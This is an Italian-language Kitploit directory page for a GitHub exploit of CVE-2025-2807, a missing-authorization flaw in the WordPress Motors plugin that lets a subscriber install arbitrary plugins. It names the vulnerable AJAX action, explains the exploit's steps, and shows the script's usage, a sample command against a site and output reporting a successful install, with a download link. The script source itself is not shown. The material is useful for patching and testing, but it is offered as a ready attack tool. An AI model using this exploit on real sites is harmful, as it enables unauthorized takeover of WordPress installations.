Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2807 — Wordpress - Plugin Motors <= 1.4.64 - Vulnerabilità di installazione arbitraria di plugin | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-2807
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubnxploited/cve-2025-2807

CVE-2025-2807

Wordpress - Plugin Motors <= 1.4.64 - Vulnerabilità di installazione arbitraria di plugin

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-2807: Plugin Motors <= 1.4.64 - Vulnerabilità di installazione arbitraria di plugin

Exploit di: Nxploited | Khaled Alenazi


⚠️ Riepilogo della vulnerabilità

Plugin: Motors (<= 1.4.64)
Tipo: Autorizzazione mancante per l'installazione arbitraria di plugin da parte di utenti autenticati (Subscriber+)
Gravità: 8.8 (CVSS v3)
Scoperta il: 07 aprile 2025
VDP: No


🔥 Impatto dell'exploit

Questa vulnerabilità consente a qualsiasi utente WordPress autenticato (Subscriber+) di installare plugin arbitrari senza alcun controllo di autorizzazione adeguato.

A causa della mancanza di validazione delle capacità nella funzione mvl_setup_wizard_install_plugin, un utente con privilegi bassi può eseguire azioni riservate agli amministratori.

📅 Si prevede che venga sfruttata su larga scala a causa della sua semplicità e dell'impatto critico.


🚫 Dettagli tecnici

  • Endpoint vulnerabile: /wp-admin/admin-ajax.php
  • Azione vulnerabile: mvl_setup_wizard_install_plugin
  • Livello di accesso richiesto: Subscriber+ (utente autenticato)
  • Problema principale: manca il controllo current_user_can('install_plugins') o simile verifica delle capacità

🚀 Script di exploit (Python)

Questo script:

  1. Effettua l'accesso come subscriber
  2. Estrae il nonce richiesto (da HTML o JS)
  3. Attiva la chiamata AJAX vulnerabile per installare un plugin a scelta

📃 Utilizzo

root@kitploit:~
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME     Subscriber username
  -p, --password PASSWORD      Subscriber password
  -pn, --plugin PLUGIN         Plugin to install (default: contact-form-7)

🐞 Esempio di esecuzione

root@kitploit:~
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7

Output:

root@kitploit:~
[*] Logging in...
[+] Logged in successfully.
[*] Fetching setup wizard page...
[+] Found nonce in HTML: 428cdf8347
[*] Attempting to install plugin: contact-form-7
[+] Plugin installation request sent successfully!
[+] Response: {"success":true,"data":"Plugin succesfully activated"}


✨ Exploit di Nxploited (Khaled Alenazi)

Scarica lo strumento